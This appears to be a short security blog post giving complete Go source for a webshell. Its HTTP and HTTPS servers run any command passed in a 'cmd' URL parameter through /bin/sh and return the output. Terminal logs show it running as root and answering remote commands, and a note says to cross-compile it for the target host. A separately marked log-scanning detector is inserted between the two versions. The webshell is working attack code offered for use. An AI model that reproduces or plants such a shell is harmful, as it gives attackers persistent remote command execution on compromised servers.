0x00 Preface
In this post I record how to implement a webshell in Golang.
0x01 HTTP
```go
package main

import (
	"fmt"
	"log"
	"net/http"
	"os"
	"os/exec"
)

var shell = "/bin/sh"
var shellArg = "-c"

func main() {
	if len(os.Args) != 2 {
		fmt.Printf("Usage: %s <listenAddress>\n", os.Args[0])
		fmt.Printf("Example: %s localhost:8080\n", os.Args[0])
		os.Exit(1)
	}

	http.HandleFunc("/", requestHandler)
	log.Println("Listening for HTTP requests.")
	err := http.ListenAndServe(os.Args[1], nil)
	if err != nil {
		log.Fatal("Error creating server. ", err)
	}
}

func requestHandler(writer http.ResponseWriter, request *http.Request) {
	// Get command to execute from GET query parameters
	cmd := request.URL.Query().Get("cmd")
	if cmd == "" {
		fmt.Fprintln(
			writer,
			"No command provided. Example: /?cmd=whoami")
		return
	}

	log.Printf("Request from %s: %s\n", request.RemoteAddr, cmd)
	fmt.Fprintf(writer, "You requested command: %s\n", cmd)

	// Run the command
	command := exec.Command(shell, shellArg, cmd)
	output, err := command.Output()
	if err != nil {
		fmt.Fprintf(writer, "Error with command.\n%s\n", err.Error())
	}

	// Write output of command to the response writer interface
	fmt.Fprintf(writer, "Output: \n%s\n", output)
}
```
```
ec2-user@kali:~/go/src/webshell$ go install webshell
ec2-user@kali:~/go/src/webshell$ ~/go/bin/webshell 0.0.0.0:80
2020/01/01 14:05:55 Listening for HTTP requests.
2020/01/01 14:05:55 Error creating server. listen tcp 0.0.0.0:80: bind: permission denied
ec2-user@kali:~/go/src/webshell$ sudo ~/go/bin/webshell 0.0.0.0:80
2020/01/01 14:06:00 Listening for HTTP requests.
2020/01/01 14:06:04 Request from 54.222.196.177:61772: ifconfig
^C
ec2-user@kali:~/go/src/webshell$
```
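A defender-side check for the request pattern this handler exposes, as an added example that is not part of the original post: it scans Common Log Format lines (assumed here to come from a reverse proxy or network sensor that sees the plaintext request) for a non-empty `cmd` query parameter. `Finding`, `FindCmdRequests` and the sample log lines are constructed for illustration.

```go
package main

import (
	"fmt"
	"net/url"
	"regexp"
)

// Finding is one logged request that carried a non-empty "cmd" parameter.
type Finding struct {
	Client  string // client address field from the log line
	Command string // URL-decoded value of the cmd parameter
}

// clfRequest captures the client and the request target of a Common Log Format line.
var clfRequest = regexp.MustCompile(`^(\S+) \S+ \S+ \[[^\]]*\] "[A-Z]+ (\S+) HTTP/[0-9.]+"`)

// FindCmdRequests returns the requests whose query string has a non-empty cmd parameter.
func FindCmdRequests(lines []string) []Finding {
	var out []Finding
	for _, line := range lines {
		m := clfRequest.FindStringSubmatch(line)
		if m == nil {
			continue // not a parseable request line
		}
		u, err := url.ParseRequestURI(m[2])
		if err != nil {
			continue // malformed request target
		}
		if cmd := u.Query().Get("cmd"); cmd != "" {
			out = append(out, Finding{Client: m[1], Command: cmd})
		}
	}
	return out
}

// sampleLog is constructed for this example (documentation address ranges).
var sampleLog = []string{
	`192.0.2.10 - - [01/Jan/2020:14:06:04 +0000] "GET /?cmd=ifconfig HTTP/1.1" 200 812`,
	`192.0.2.10 - - [01/Jan/2020:14:06:09 +0000] "GET /?cmd=uname%20-a HTTP/1.1" 200 143`,
	`198.51.100.7 - - [01/Jan/2020:14:07:00 +0000] "GET /index.html?page=2 HTTP/1.1" 200 5120`,
	`198.51.100.7 - - [01/Jan/2020:14:07:02 +0000] "GET /?cmd= HTTP/1.1" 200 44`,
	`garbage line`,
}

func main() {
	fmt.Println(FindCmdRequests(sampleLog))
}
```

The match is tied to the parameter name `cmd` used on this page, so it is one signal rather than a complete detection.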
0x02 HTTPS
Configure the certificate and private key and the shell can be served over HTTPS.

```go
package main

import (
	"fmt"
	"log"
	"net/http"
	"os"
	"os/exec"
)

var shell = "/bin/sh"
var shellArg = "-c"

func main() {
	if len(os.Args) != 2 {
		fmt.Printf("Usage: %s <listenAddress>\n", os.Args[0])
		fmt.Printf("Example: %s localhost:8080\n", os.Args[0])
		os.Exit(1)
	}

	http.HandleFunc("/", requestHandler)
	log.Println("Listening for HTTPS requests.")
	// The listen address comes from the first command-line argument
	err := http.ListenAndServeTLS(
		os.Args[1],
		"cert.pem",
		"privateKey.pem",
		nil,
	)
	if err != nil {
		log.Fatal("Error creating server. ", err)
	}
}

func requestHandler(writer http.ResponseWriter, request *http.Request) {
	// Get command to execute from GET query parameters
	cmd := request.URL.Query().Get("cmd")
	if cmd == "" {
		fmt.Fprintln(
			writer,
			"No command provided. Example: /?cmd=whoami")
		return
	}

	log.Printf("Request from %s: %s\n", request.RemoteAddr, cmd)
	fmt.Fprintf(writer, "You requested command: %s\n", cmd)

	// Run the command
	command := exec.Command(shell, shellArg, cmd)
	output, err := command.Output()
	if err != nil {
		fmt.Fprintf(writer, "Error with command.\n%s\n", err.Error())
	}

	// Write output of command to the response writer interface
	fmt.Fprintf(writer, "Output: \n%s\n", output)
}
```
```
ec2-user@kali:~/go/src/httpswebshell$ curl 127.0.0.1:443/?cmd=id
You requested command: id
Output:
uid=0(root) gid=0(root) groups=0(root)
```
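0x03 Usage (cross-compilation)
The program needs to be compiled into an executable that matches the target host's type. Commands for local testing:

```
sudo go run ~/go/src/httpswebshell/webshell.go 0.0.0.0:443
go install httpswebshell # build
```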
0x04 Afterword
A record of implementing a webshell in Golang, served over HTTP(S).
0x05 References
[1] Security with Go
- Source: tonghuaroot.com